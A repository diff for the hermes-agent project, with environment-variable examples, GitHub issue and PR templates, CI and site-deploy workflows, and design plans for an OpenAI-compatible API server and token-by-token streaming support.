# EMAIL_HOME_ADDRESS=your@email.com
# Gateway-wide: allow ALL users without an allowlist (default: false = deny)
# Only set to true if you intentionally want open access.
# GATEWAY_ALLOW_ALL_USERS=false
# =============================================================================
# RESPONSE PACING
# =============================================================================
# Human-like delays between message chunks on messaging platforms.
# Makes the bot feel less robotic.
# HERMES_HUMAN_DELAY_MODE=off # off | natural | custom
# HERMES_HUMAN_DELAY_MIN_MS=800 # Min delay in ms (custom mode)
# HERMES_HUMAN_DELAY_MAX_MS=2500 # Max delay in ms (custom mode)
# =============================================================================
# DEBUG OPTIONS
# =============================================================================
WEB_TOOLS_DEBUG=false
VISION_TOOLS_DEBUG=false
MOA_TOOLS_DEBUG=false
IMAGE_TOOLS_DEBUG=false
# =============================================================================
# CONTEXT COMPRESSION (Auto-shrinks long conversations)
# =============================================================================
# When conversation approaches model's context limit, middle turns are
# automatically summarized to free up space.
#
# Context compression is configured in ~/.hermes/config.yaml under compression:
# CONTEXT_COMPRESSION_ENABLED=true # Enable auto-compression (default: true)
# CONTEXT_COMPRESSION_THRESHOLD=0.85 # Compress at 85% of context limit
# Model is set via compression.summary_model in config.yaml (default: google/gemini-3-flash-preview)
# =============================================================================
# RL TRAINING (Tinker + Atropos)
# =============================================================================
# Run reinforcement learning training on language models using the Tinker API.
# Requires the rl-server to be running (from tinker-atropos package).
# Tinker API Key - RL training service
# Get at: https://tinker-console.thinkingmachines.ai/keys
TINKER_API_KEY=
# Weights & Biases API Key - Experiment tracking and metrics
# Get at: https://wandb.ai/authorize
WANDB_API_KEY=
# RL API Server URL (default: http://localhost:8080)
# Change if running the rl-server on a different host/port
# RL_API_URL=http://localhost:8080
# =============================================================================
# SKILLS HUB (GitHub integration for skill search/install/publish)
# =============================================================================
# GitHub Personal Access Token — for higher API rate limits on skill search/install
# Get at: https://github.com/settings/tokens (Fine-grained recommended)
# GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxx
# GitHub App credentials (optional — for bot identity on PRs)
# GITHUB_APP_ID=
# GITHUB_APP_PRIVATE_KEY_PATH=
# GITHUB_APP_INSTALLATION_ID=

144
.github/ISSUE_TEMPLATE/bug_report.yml vendored Normal file
View File

@@ -0,0 +1,144 @@
name: "🐛 Bug Report"
description: Report a bug — something that's broken, crashes, or behaves incorrectly.
title: "[Bug]: "
labels: ["bug"]
body:
- type: markdown
attributes:
value: |
Thanks for reporting a bug! Please fill out the sections below so we can reproduce and fix it quickly.
**Before submitting**, please:
- [ ] Search [existing issues](https://github.com/NousResearch/hermes-agent/issues) to avoid duplicates
- [ ] Update to the latest version (`hermes update`) and confirm the bug still exists
- type: textarea
id: description
attributes:
label: Bug Description
description: A clear description of what's broken. Include error messages, tracebacks, or screenshots if relevant.
placeholder: |
What happened? What did you expect to happen instead?
validations:
required: true
- type: textarea
id: reproduction
attributes:
label: Steps to Reproduce
description: Minimal steps to trigger the bug. The more specific, the faster we can fix it.
placeholder: |
1. Run `hermes chat`
2. Send the message "..."
3. Agent calls tool X
4. Error appears: ...
validations:
required: true
- type: textarea
id: expected
attributes:
label: Expected Behavior
description: What should have happened instead?
validations:
required: true
- type: textarea
id: actual
attributes:
label: Actual Behavior
description: What actually happened? Include full error output if available.
validations:
required: true
- type: dropdown
id: component
attributes:
label: Affected Component
description: Which part of Hermes is affected?
multiple: true
options:
- CLI (interactive chat)
- Gateway (Telegram/Discord/Slack/WhatsApp)
- Setup / Installation
- Tools (terminal, file ops, web, code execution, etc.)
- Skills (skill loading, skill hub, skill guard)
- Agent Core (conversation loop, context compression, memory)
- Configuration (config.yaml, .env, hermes setup)
- Other
validations:
required: true
- type: dropdown
id: platform
attributes:
label: Messaging Platform (if gateway-related)
description: Which platform adapter is affected?
multiple: true
options:
- N/A (CLI only)
- Telegram
- Discord
- Slack
- WhatsApp
- type: input
id: os
attributes:
label: Operating System
description: e.g. Ubuntu 24.04, macOS 15.2, Windows 11
placeholder: Ubuntu 24.04
validations:
required: true
- type: input
id: python-version
attributes:
label: Python Version
description: Output of `python --version`
placeholder: "3.11.9"
validations:
required: true
- type: input
id: hermes-version
attributes:
label: Hermes Version
description: Output of `hermes version`
placeholder: "2.1.0"
validations:
required: true
- type: textarea
id: logs
attributes:
label: Relevant Logs / Traceback
description: Paste any error output, traceback, or log messages. This will be auto-formatted as code.
render: shell
- type: textarea
id: root-cause
attributes:
label: Root Cause Analysis (optional)
description: |
If you've dug into the code and identified the root cause, share it here.
Include file paths, line numbers, and code snippets if possible. This massively speeds up fixes.
placeholder: |
The bug is in `gateway/run.py` line 949. `len(history)` counts session_meta entries
but `agent_messages` was built from filtered history...
- type: textarea
id: proposed-fix
attributes:
label: Proposed Fix (optional)
description: If you have a fix in mind (or a PR ready), describe it here.
placeholder: |
Replace `.get()` with `.pop()` on line 289 of `gateway/platforms/base.py`
to actually clear the pending message after retrieval.
- type: checkboxes
id: pr-ready
attributes:
label: Are you willing to submit a PR for this?
options:
- label: I'd like to fix this myself and submit a PR

11
.github/ISSUE_TEMPLATE/config.yml vendored Normal file
View File

@@ -0,0 +1,11 @@
blank_issues_enabled: true
contact_links:
- name: 💬 Nous Research Discord
url: https://discord.gg/NousResearch
about: For quick questions, showcasing projects, sharing skills, and community chat.
- name: 📖 Documentation
url: https://github.com/NousResearch/hermes-agent/blob/main/README.md
about: Check the README and docs before opening an issue.
- name: 🤝 Contributing Guide
url: https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md
about: Read this before submitting a PR.

View File

@@ -0,0 +1,73 @@
name: "✨ Feature Request"
description: Suggest a new feature or improvement.
title: "[Feature]: "
labels: ["enhancement"]
body:
- type: markdown
attributes:
value: |
Thanks for the suggestion! Before submitting, please consider:
- **Is this a new skill?** Most capabilities should be [skills, not tools](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#should-it-be-a-skill-or-a-tool). If it's a specialized integration (crypto, NFT, niche SaaS), it belongs on the Skills Hub, not bundled.
- **Search [existing issues](https://github.com/NousResearch/hermes-agent/issues)** — someone may have already proposed this.
- type: textarea
id: problem
attributes:
label: Problem or Use Case
description: What problem does this solve? What are you trying to do that you can't today?
placeholder: |
I'm trying to use Hermes with [provider/platform/workflow] but currently
there's no way to...
validations:
required: true
- type: textarea
id: solution
attributes:
label: Proposed Solution
description: How do you think this should work? Be as specific as you can — CLI flags, config options, UI behavior.
placeholder: |
Add a `--foo` flag to `hermes chat` that enables...
Or: Add a config key `bar.baz` that controls...
validations:
required: true
- type: textarea
id: alternatives
attributes:
label: Alternatives Considered
description: What other approaches did you consider? Why is the proposed solution better?
- type: dropdown
id: type
attributes:
label: Feature Type
options:
- New tool
- New bundled skill
- CLI improvement
- Gateway / messaging improvement
- Configuration option
- Performance / reliability
- Developer experience (tests, docs, CI)
- Other
validations:
required: true
- type: dropdown
id: scope
attributes:
label: Scope
description: How big is this change?
options:
- Small (single file, < 50 lines)
- Medium (few files, < 300 lines)
- Large (new module or significant refactor)
- type: checkboxes
id: pr-ready
attributes:
label: Contribution
options:
- label: I'd like to implement this myself and submit a PR

100
.github/ISSUE_TEMPLATE/setup_help.yml vendored Normal file
View File

@@ -0,0 +1,100 @@
name: "🔧 Setup / Installation Help"
description: Having trouble installing or configuring Hermes? Ask here.
title: "[Setup]: "
labels: ["setup"]
body:
- type: markdown
attributes:
value: |
Sorry you're having trouble! Please fill out the details below so we can help.
**Quick checks first:**
- Run `hermes doctor` and include the output below
- Try `hermes update` to get the latest version
- Check the [README troubleshooting section](https://github.com/NousResearch/hermes-agent#troubleshooting)
- For general questions, consider the [Nous Research Discord](https://discord.gg/NousResearch) for faster help
- type: textarea
id: description
attributes:
label: What's Going Wrong?
description: Describe what you're trying to do and where it fails.
placeholder: |
I ran `hermes setup` and selected Nous Portal, but when I try to
start the gateway I get...
validations:
required: true
- type: textarea
id: steps
attributes:
label: Steps Taken
description: What did you do? Include the exact commands you ran.
placeholder: |
1. Ran the install script: `curl -fsSL ... | bash`
2. Ran `hermes setup` and chose "Quick setup"
3. Selected OpenRouter, entered API key
4. Ran `hermes chat` and got error...
validations:
required: true
- type: dropdown
id: install-method
attributes:
label: Installation Method
options:
- Install script (curl | bash)
- Manual clone + pip/uv install
- PowerShell installer (Windows)
- Docker
- Other
validations:
required: true
- type: input
id: os
attributes:
label: Operating System
placeholder: Ubuntu 24.04 / macOS 15.2 / Windows 11
validations:
required: true
- type: input
id: python-version
attributes:
label: Python Version
description: Output of `python --version` (or `python3 --version`)
placeholder: "3.11.9"
- type: input
id: hermes-version
attributes:
label: Hermes Version
description: Output of `hermes version` (if install got that far)
placeholder: "2.1.0"
- type: textarea
id: doctor-output
attributes:
label: Output of `hermes doctor`
description: Run `hermes doctor` and paste the full output. This will be auto-formatted.
render: shell
- type: textarea
id: error-output
attributes:
label: Full Error Output
description: Paste the complete error message or traceback. This will be auto-formatted.
render: shell
validations:
required: true
- type: textarea
id: tried
attributes:
label: What I've Already Tried
description: List any fixes or workarounds you've already attempted.
placeholder: |
- Ran `hermes update`
- Tried reinstalling with `pip install -e ".[all]"`
- Checked that OPENROUTER_API_KEY is set in ~/.hermes/.env

75
.github/PULL_REQUEST_TEMPLATE.md vendored Normal file
View File

@@ -0,0 +1,75 @@
## What does this PR do?
<!-- Describe the change clearly. What problem does it solve? Why is this approach the right one? -->
## Related Issue
<!-- Link the issue this PR addresses. If no issue exists, consider creating one first. -->
Fixes #
## Type of Change
<!-- Check the one that applies. -->
- [ ] 🐛 Bug fix (non-breaking change that fixes an issue)
- [ ] ✨ New feature (non-breaking change that adds functionality)
- [ ] 🔒 Security fix
- [ ] 📝 Documentation update
- [ ] ✅ Tests (adding or improving test coverage)
- [ ] ♻️ Refactor (no behavior change)
- [ ] 🎯 New skill (bundled or hub)
## Changes Made
<!-- List the specific changes. Include file paths for code changes. -->
-
## How to Test
<!-- Steps to verify this change works. For bugs: reproduction steps + proof that the fix works. -->
1.
2.
3.
## Checklist
<!-- Complete these before requesting review. -->
### Code
- [ ] I've read the [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md)
- [ ] My commit messages follow [Conventional Commits](https://www.conventionalcommits.org/) (`fix(scope):`, `feat(scope):`, etc.)
- [ ] I searched for [existing PRs](https://github.com/NousResearch/hermes-agent/pulls) to make sure this isn't a duplicate
- [ ] My PR contains **only** changes related to this fix/feature (no unrelated commits)
- [ ] I've run `pytest tests/ -q` and all tests pass
- [ ] I've added tests for my changes (required for bug fixes, strongly encouraged for features)
- [ ] I've tested on my platform: <!-- e.g. Ubuntu 24.04, macOS 15.2, Windows 11 -->
### Documentation & Housekeeping
<!-- Check all that apply. It's OK to check "N/A" if a category doesn't apply to your change. -->
- [ ] I've updated relevant documentation (README, `docs/`, docstrings) — or N/A
- [ ] I've updated `cli-config.yaml.example` if I added/changed config keys — or N/A
- [ ] I've updated `CONTRIBUTING.md` or `AGENTS.md` if I changed architecture or workflows — or N/A
- [ ] I've considered cross-platform impact (Windows, macOS) per the [compatibility guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#cross-platform-compatibility) — or N/A
- [ ] I've updated tool descriptions/schemas if I changed tool behavior — or N/A
## For New Skills
<!-- Only fill this out if you're adding a skill. Delete this section otherwise. -->
- [ ] This skill is **broadly useful** to most users (if bundled) — see [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#should-the-skill-be-bundled)
- [ ] SKILL.md follows the [standard format](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#skillmd-format) (frontmatter, trigger conditions, steps, pitfalls)
- [ ] No external dependencies that aren't already available (prefer stdlib, curl, existing Hermes tools)
- [ ] I've tested the skill end-to-end: `hermes --toolsets skills -q "Use the X skill to do Y"`
## Screenshots / Logs
<!-- If applicable, add screenshots or log output showing the fix/feature in action. -->

60
.github/workflows/deploy-site.yml vendored Normal file
View File

@@ -0,0 +1,60 @@
name: Deploy Site
on:
push:
branches: [main]
paths:
- 'website/**'
- 'landingpage/**'
- '.github/workflows/deploy-site.yml'
workflow_dispatch:
permissions:
pages: write
id-token: write
concurrency:
group: pages
cancel-in-progress: false
jobs:
build-and-deploy:
runs-on: ubuntu-latest
environment:
name: github-pages
url: ${{ steps.deploy.outputs.page_url }}
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: 20
cache: npm
cache-dependency-path: website/package-lock.json
- name: Install dependencies
run: npm ci
working-directory: website
- name: Build Docusaurus
run: npm run build
working-directory: website
- name: Stage deployment
run: |
mkdir -p _site/docs
# Landing page at root
cp -r landingpage/* _site/
# Docusaurus at /docs/
cp -r website/build/* _site/docs/
# CNAME so GitHub Pages keeps the custom domain between deploys
echo "hermes-agent.nousresearch.com" > _site/CNAME
- name: Upload artifact
uses: actions/upload-pages-artifact@v3
with:
path: _site
- name: Deploy to GitHub Pages
id: deploy
uses: actions/deploy-pages@v4

42
.github/workflows/tests.yml vendored Normal file
View File

@@ -0,0 +1,42 @@
name: Tests
on:
push:
branches: [main]
pull_request:
branches: [main]
# Cancel in-progress runs for the same PR/branch
concurrency:
group: tests-${{ github.ref }}
cancel-in-progress: true
jobs:
test:
runs-on: ubuntu-latest
timeout-minutes: 10
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Install uv
uses: astral-sh/setup-uv@v5
- name: Set up Python 3.11
run: uv python install 3.11
- name: Install dependencies
run: |
uv venv .venv --python 3.11
source .venv/bin/activate
uv pip install -e ".[all,dev]"
- name: Run tests
run: |
source .venv/bin/activate
python -m pytest tests/ -q --ignore=tests/integration --tb=short -n auto
env:
# Ensure tests don't accidentally call real APIs
OPENROUTER_API_KEY: ""
OPENAI_API_KEY: ""
NOUS_API_KEY: ""

87
.gitignore vendored
View File

@@ -1,32 +1,55 @@
/venv/
/_pycache/
hecate/
hecate-lib/
*.pyc*
__pycache__/
.venv/
.vscode/
.env
.env.local
.env.development.local
.env.test.local
.env.production.local
.env.development
.env.test
export*
__pycache__/model_tools.cpython-310.pyc
__pycache__/web_tools.cpython-310.pyc
logs/
data/
.pytest_cache/
tmp/
temp_vision_images/
hermes-*/*
examples/
tests/quick_test_dataset.jsonl
tests/sample_dataset.jsonl
run_datagen_kimik2-thinking.sh
run_datagen_megascience_glm4-6.sh
run_datagen_sonnet.sh
source-data/*
run_datagen_megascience_glm4-6.sh
/venv/
/_pycache/
*.pyc*
__pycache__/
.venv/
.vscode/
.env
.env.local
.env.development.local
.env.test.local
.env.production.local
.env.development
.env.test
export*
__pycache__/model_tools.cpython-310.pyc
__pycache__/web_tools.cpython-310.pyc
logs/
data/
.pytest_cache/
tmp/
temp_vision_images/
hermes-*/*
examples/
tests/quick_test_dataset.jsonl
tests/sample_dataset.jsonl
run_datagen_kimik2-thinking.sh
run_datagen_megascience_glm4-6.sh
run_datagen_sonnet.sh
source-data/*
run_datagen_megascience_glm4-6.sh
data/*
node_modules/
browser-use/
agent-browser/
# Private keys
*.ppk
*.pem
privvy*
images/
__pycache__/
hermes_agent.egg-info/
wandb/
testlogs
# CLI config (may contain sensitive SSH paths)
cli-config.yaml
# Skills Hub state (lives in ~/.hermes/skills/.hub/ at runtime, but just in case)
skills/.hub/
ignored/
.worktrees/
environments/benchmarks/evals/
# Release script temp files
.release_notes.md

6
.gitmodules vendored Normal file
View File

@@ -0,0 +1,6 @@
[submodule "mini-swe-agent"]
path = mini-swe-agent
url = https://github.com/SWE-agent/mini-swe-agent
[submodule "tinker-atropos"]
path = tinker-atropos
url = https://github.com/nousresearch/tinker-atropos

291
.plans/openai-api-server.md Normal file
View File

@@ -0,0 +1,291 @@
# OpenAI-Compatible API Server for Hermes Agent
## Motivation
Every major chat frontend (Open WebUI 126k★, LobeChat 73k★, LibreChat 34k★,
AnythingLLM 56k★, NextChat 87k★, ChatBox 39k★, Jan 26k★, HF Chat-UI 8k★,
big-AGI 7k★) connects to backends via the OpenAI-compatible REST API with
SSE streaming. By exposing this endpoint, hermes-agent becomes instantly
usable as a backend for all of them — no custom adapters needed.
## What It Enables
```
┌──────────────────┐
│ Open WebUI │──┐
│ LobeChat │ │ POST /v1/chat/completions
│ LibreChat │ ├──► Authorization: Bearer <key> ┌─────────────────┐
│ AnythingLLM │ │ {"messages": [...]} │ hermes-agent │
│ NextChat │ │ │ gateway │
│ Any OAI client │──┘ ◄── SSE streaming response │ (API server) │
└──────────────────┘ └─────────────────┘
```
A user would:
1. Set `API_SERVER_ENABLED=true` in `~/.hermes/.env`
2. Run `hermes gateway` (API server starts alongside Telegram/Discord/etc.)
3. Point Open WebUI (or any frontend) at `http://localhost:8642/v1`
4. Chat with hermes-agent through any OpenAI-compatible UI
## Endpoints
| Method | Path | Purpose |
|--------|------|---------|
| POST | `/v1/chat/completions` | Chat with the agent (streaming + non-streaming) |
| GET | `/v1/models` | List available "models" (returns hermes-agent as a model) |
| GET | `/health` | Health check |
## Architecture
### Option A: Gateway Platform Adapter (recommended)
Create `gateway/platforms/api_server.py` as a new platform adapter that
extends `BasePlatformAdapter`. This is the cleanest approach because:
- Reuses all gateway infrastructure (session management, auth, context building)
- Runs in the same async loop as other adapters
- Gets message handling, interrupt support, and session persistence for free
- Follows the established pattern (like Telegram, Discord, etc.)
- Uses `aiohttp.web` (already a dependency) for the HTTP server
The adapter would start an `aiohttp.web.Application` server in `connect()`
and route incoming HTTP requests through the standard `handle_message()` pipeline.
### Option B: Standalone Component
A separate HTTP server class in `gateway/api_server.py` that creates its own
AIAgent instances directly. Simpler but duplicates session/auth logic.
**Recommendation: Option A** — fits the existing architecture, less code to
maintain, gets all gateway features for free.
## Request/Response Format
### Chat Completions (non-streaming)
```
POST /v1/chat/completions
Authorization: Bearer hermes-api-key-here
Content-Type: application/json
{
"model": "hermes-agent",
"messages": [
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": "What files are in the current directory?"}
],
"stream": false,
"temperature": 0.7
}
```
Response:
```json
{
"id": "chatcmpl-abc123",
"object": "chat.completion",
"created": 1710000000,
"model": "hermes-agent",
"choices": [{
"index": 0,
"message": {
"role": "assistant",
"content": "Here are the files in the current directory:\n..."
},
"finish_reason": "stop"
}],
"usage": {
"prompt_tokens": 50,
"completion_tokens": 200,
"total_tokens": 250
}
}
```
### Chat Completions (streaming)
Same request with `"stream": true`. Response is SSE:
```
data: {"id":"chatcmpl-abc123","object":"chat.completion.chunk","choices":[{"index":0,"delta":{"role":"assistant"},"finish_reason":null}]}
data: {"id":"chatcmpl-abc123","object":"chat.completion.chunk","choices":[{"index":0,"delta":{"content":"Here "},"finish_reason":null}]}
data: {"id":"chatcmpl-abc123","object":"chat.completion.chunk","choices":[{"index":0,"delta":{"content":"are "},"finish_reason":null}]}
data: {"id":"chatcmpl-abc123","object":"chat.completion.chunk","choices":[{"index":0,"delta":{},"finish_reason":"stop"}]}
data: [DONE]
```
### Models List
```
GET /v1/models
Authorization: Bearer hermes-api-key-here
```
Response:
```json
{
"object": "list",
"data": [{
"id": "hermes-agent",
"object": "model",
"created": 1710000000,
"owned_by": "hermes-agent"
}]
}
```
## Key Design Decisions
### 1. Session Management
The OpenAI API is stateless — each request includes the full conversation.
But hermes-agent sessions have persistent state (memory, skills, tool context).
**Approach: Hybrid**
- Default: Stateless. Each request is independent. The `messages` array IS
the conversation. No session persistence between requests.
- Opt-in persistent sessions via `X-Session-ID` header. When provided, the
server maintains session state across requests (conversation history,
memory context, tool state). This enables richer agent behavior.
- The session ID also enables interrupt support — a subsequent request with
the same session ID while one is running triggers an interrupt.
### 2. Streaming
The agent's `run_conversation()` is synchronous and returns the full response.
For real SSE streaming, we need to emit chunks as they're generated.
**Phase 1 (MVP):** Run agent in a thread, return the complete response as
a single SSE chunk + `[DONE]`. This works with all frontends — they just see
a fast single-chunk response. Not true streaming but functional.
**Phase 2:** Add a response callback to AIAgent that emits text chunks as the
LLM generates them. The API server captures these via a queue and streams them
as SSE events. This gives real token-by-token streaming.
**Phase 3:** Stream tool execution progress too — emit tool call/result events
as the agent works, giving frontends visibility into what the agent is doing.
### 3. Tool Transparency
Two modes:
- **Opaque (default):** Frontends see only the final response. Tool calls
happen server-side and are invisible. Best for general-purpose UIs.
- **Transparent (opt-in via header):** Tool calls are emitted as OpenAI-format
tool_call/tool_result messages in the stream. Useful for agent-aware frontends.
### 4. Authentication
- Bearer token via `Authorization: Bearer <key>` header
- Token configured via `API_SERVER_KEY` env var
- Optional: allow unauthenticated local-only access (127.0.0.1 bind)
- Follows the same pattern as other platform adapters
### 5. Model Mapping
Frontends send `"model": "hermes-agent"` (or whatever). The actual LLM model
used is configured server-side in config.yaml. The API server maps any
requested model name to the configured hermes-agent model.
Optionally, allow model passthrough: if the frontend sends
`"model": "anthropic/claude-sonnet-4"`, the agent uses that model. Controlled
by a config flag.
## Configuration
```yaml
# In config.yaml
api_server:
enabled: true
port: 8642
host: "127.0.0.1" # localhost only by default
key: "your-secret-key" # or via API_SERVER_KEY env var
allow_model_override: false # let clients choose the model
max_concurrent: 5 # max simultaneous requests
```
Environment variables:
```bash
API_SERVER_ENABLED=true
API_SERVER_PORT=8642
API_SERVER_HOST=127.0.0.1
API_SERVER_KEY=your-secret-key
```
## Implementation Plan
### Phase 1: MVP (non-streaming) — PR
1. `gateway/platforms/api_server.py` — new adapter
- aiohttp.web server with endpoints:
- `POST /v1/chat/completions` — Chat Completions API (universal compat)
- `POST /v1/responses` — Responses API (server-side state, tool preservation)
- `GET /v1/models` — list available models
- `GET /health` — health check
- Bearer token auth middleware
- Non-streaming responses (run agent, return full result)
- Chat Completions: stateless, messages array is the conversation
- Responses API: server-side conversation storage via previous_response_id
- Store full internal conversation (including tool calls) keyed by response ID
- On subsequent requests, reconstruct full context from stored chain
- Frontend system prompt layered on top of hermes-agent's core prompt
2. `gateway/config.py` — add `Platform.API_SERVER` enum + config
3. `gateway/run.py` — register adapter in `_create_adapter()`
4. Tests in `tests/gateway/test_api_server.py`
### Phase 2: SSE Streaming
1. Add response streaming to both endpoints
- Chat Completions: `choices[0].delta.content` SSE format
- Responses API: semantic events (response.output_text.delta, etc.)
- Run agent in thread, collect output via callback queue
- Handle client disconnect (cancel agent)
2. Add `stream_callback` parameter to `AIAgent.run_conversation()`
### Phase 3: Enhanced Features
1. Tool call transparency mode (opt-in)
2. Model passthrough/override
3. Concurrent request limiting
4. Usage tracking / rate limiting
5. CORS headers for browser-based frontends
6. GET /v1/responses/{id} — retrieve stored response
7. DELETE /v1/responses/{id} — delete stored response
## Files Changed
| File | Change |
|------|--------|
| `gateway/platforms/api_server.py` | NEW — main adapter (~300 lines) |
| `gateway/config.py` | Add Platform.API_SERVER + config (~20 lines) |
| `gateway/run.py` | Register adapter in _create_adapter() (~10 lines) |
| `tests/gateway/test_api_server.py` | NEW — tests (~200 lines) |
| `cli-config.yaml.example` | Add api_server section |
| `README.md` | Mention API server in platform list |
## Compatibility Matrix
Once implemented, hermes-agent works as a drop-in backend for:
| Frontend | Stars | How to Connect |
|----------|-------|---------------|
| Open WebUI | 126k | Settings → Connections → Add OpenAI API, URL: `http://localhost:8642/v1` |
| NextChat | 87k | BASE_URL env var |
| LobeChat | 73k | Custom provider endpoint |
| AnythingLLM | 56k | LLM Provider → Generic OpenAI |
| Oobabooga | 42k | Already a backend, not a frontend |
| ChatBox | 39k | API Host setting |
| LibreChat | 34k | librechat.yaml custom endpoint |
| Chatbot UI | 29k | Custom API endpoint |
| Jan | 26k | Remote model config |
| AionUI | 18k | Custom API endpoint |
| HF Chat-UI | 8k | OPENAI_BASE_URL env var |
| big-AGI | 7k | Custom endpoint |

705
.plans/streaming-support.md Normal file
View File

@@ -0,0 +1,705 @@
# Streaming LLM Response Support for Hermes Agent
## Overview
Add token-by-token streaming of LLM responses across all platforms. When enabled,
users see the response typing out live instead of waiting for the full generation.
Streaming is opt-in via config, defaults to off, and all existing non-streaming
code paths remain intact as the default.
## Design Principles
1. **Feature-flagged**: `streaming.enabled: true` in config.yaml. Off by default.
When off, all existing code paths are unchanged — zero risk to current behavior.
2. **Callback-based**: A simple `stream_callback(text_delta: str)` function injected
into AIAgent. The agent doesn't know or care what the consumer does with tokens.
3. **Graceful degradation**: If the provider doesn't support streaming, or streaming
fails for any reason, silently fall back to the non-streaming path.
4. **Platform-agnostic core**: The streaming mechanism in AIAgent works the same
regardless of whether the consumer is CLI, Telegram, Discord, or the API server.
---
## Architecture
```
stream_callback(delta)
┌─────────────┐ ┌─────────────▼──────────────┐
│ LLM API │ │ queue.Queue() │
│ (stream) │───►│ thread-safe bridge between │
│ │ │ agent thread & consumer │
└─────────────┘ └─────────────┬──────────────┘
┌──────────────┼──────────────┐
│ │ │
┌─────▼─────┐ ┌─────▼─────┐ ┌─────▼─────┐
│ CLI │ │ Gateway │ │ API Server│
│ print to │ │ edit msg │ │ SSE event │
│ terminal │ │ on Tg/Dc │ │ to client │
└───────────┘ └───────────┘ └───────────┘
```
The agent runs in a thread. The callback puts tokens into a thread-safe queue.
Each consumer reads the queue in its own context (async task, main thread, etc.).
---
## Configuration
### config.yaml
```yaml
streaming:
enabled: false # Master switch. Default off.
# Per-platform overrides (optional):
# cli: true # Override for CLI only
# telegram: true # Override for Telegram only
# discord: false # Keep Discord non-streaming
# api_server: true # Override for API server
```
### Environment variables
```
HERMES_STREAMING_ENABLED=true # Master switch via env
```
### How the flag is read
- **CLI**: `load_cli_config()` reads `streaming.enabled`, sets env var. AIAgent
checks at init time.
- **Gateway**: `_run_agent()` reads config, decides whether to pass
`stream_callback` to the AIAgent constructor.
- **API server**: For Chat Completions `stream=true` requests, always uses streaming
regardless of config (the client is explicitly requesting it). For non-stream
requests, uses config.
### Precedence
1. API server: client's `stream` field overrides everything
2. Per-platform config override (e.g., `streaming.telegram: true`)
3. Master `streaming.enabled` flag
4. Default: off
---
## Implementation Plan
### Phase 1: Core streaming infrastructure in AIAgent
**File: run_agent.py**
#### 1a. Add stream_callback parameter to __init__ (~5 lines)
```python
def __init__(self, ..., stream_callback: callable = None, ...):
self.stream_callback = stream_callback
```
No other init changes. The callback is optional — when None, everything
works exactly as before.
#### 1b. Add _run_streaming_chat_completion() method (~65 lines)
New method for Chat Completions API streaming:
```python
def _run_streaming_chat_completion(self, api_kwargs: dict):
"""Stream a chat completion, emitting text tokens via stream_callback.
Returns a fake response object compatible with the non-streaming code path.
Falls back to non-streaming on any error.
"""
stream_kwargs = dict(api_kwargs)
stream_kwargs["stream"] = True
stream_kwargs["stream_options"] = {"include_usage": True}
accumulated_content = []
accumulated_tool_calls = {} # index -> {id, name, arguments}
final_usage = None
try:
stream = self.client.chat.completions.create(**stream_kwargs)
for chunk in stream:
if not chunk.choices:
# Usage-only chunk (final)
if chunk.usage:
final_usage = chunk.usage
continue
delta = chunk.choices[0].delta
# Text content — emit via callback
if delta.content:
accumulated_content.append(delta.content)
if self.stream_callback:
try:
self.stream_callback(delta.content)
except Exception:
pass
# Tool call deltas — accumulate silently
if delta.tool_calls:
for tc_delta in delta.tool_calls:
idx = tc_delta.index
if idx not in accumulated_tool_calls:
accumulated_tool_calls[idx] = {
"id": tc_delta.id or "",
"name": "", "arguments": ""
}
if tc_delta.function:
if tc_delta.function.name:
accumulated_tool_calls[idx]["name"] = tc_delta.function.name
if tc_delta.function.arguments:
accumulated_tool_calls[idx]["arguments"] += tc_delta.function.arguments
# Build fake response compatible with existing code
tool_calls = []
for idx in sorted(accumulated_tool_calls):
tc = accumulated_tool_calls[idx]
if tc["name"]:
tool_calls.append(SimpleNamespace(
id=tc["id"], type="function",
function=SimpleNamespace(name=tc["name"], arguments=tc["arguments"]),
))
return SimpleNamespace(
choices=[SimpleNamespace(
message=SimpleNamespace(
content="".join(accumulated_content) or "",
tool_calls=tool_calls or None,
role="assistant",
),
finish_reason="tool_calls" if tool_calls else "stop",
)],
usage=final_usage,
model=self.model,
)
except Exception as e:
logger.debug("Streaming failed, falling back to non-streaming: %s", e)
return self.client.chat.completions.create(**api_kwargs)
```
#### 1c. Modify _run_codex_stream() for Responses API (~10 lines)
The method already iterates the stream. Add callback emission:
```python
def _run_codex_stream(self, api_kwargs: dict):
with self.client.responses.stream(**api_kwargs) as stream:
for event in stream:
# Emit text deltas if streaming callback is set
if self.stream_callback and hasattr(event, 'type'):
if event.type == 'response.output_text.delta':
try:
self.stream_callback(event.delta)
except Exception:
pass
return stream.get_final_response()
```
#### 1d. Modify _interruptible_api_call() (~5 lines)
Add the streaming branch:
```python
def _call():
try:
if self.api_mode == "codex_responses":
result["response"] = self._run_codex_stream(api_kwargs)
elif self.stream_callback is not None:
result["response"] = self._run_streaming_chat_completion(api_kwargs)
else:
result["response"] = self.client.chat.completions.create(**api_kwargs)
except Exception as e:
result["error"] = e
```
#### 1e. Signal end-of-stream to consumers (~5 lines)
After the API call returns, signal the callback that streaming is done
so consumers can finalize (remove cursor, close SSE, etc.):
```python
# In run_conversation(), after _interruptible_api_call returns:
if self.stream_callback:
try:
self.stream_callback(None) # None = end of stream signal
except Exception:
pass
```
Consumers check: `if delta is None: finalize()`
**Tests for Phase 1:** (~150 lines)
- Test _run_streaming_chat_completion with mocked stream
- Test fallback to non-streaming on error
- Test tool_call accumulation during streaming
- Test stream_callback receives correct deltas
- Test None signal at end of stream
- Test streaming disabled when callback is None
---
### Phase 2: Gateway consumers (Telegram, Discord, etc.)
**File: gateway/run.py**
#### 2a. Read streaming config (~15 lines)
In `_run_agent()`, before creating the AIAgent:
```python
# Read streaming config
_streaming_enabled = False
try:
# Check per-platform override first
platform_key = source.platform.value if source.platform else ""
_stream_cfg = {} # loaded from config.yaml streaming section
if _stream_cfg.get(platform_key) is not None:
_streaming_enabled = bool(_stream_cfg[platform_key])
else:
_streaming_enabled = bool(_stream_cfg.get("enabled", False))
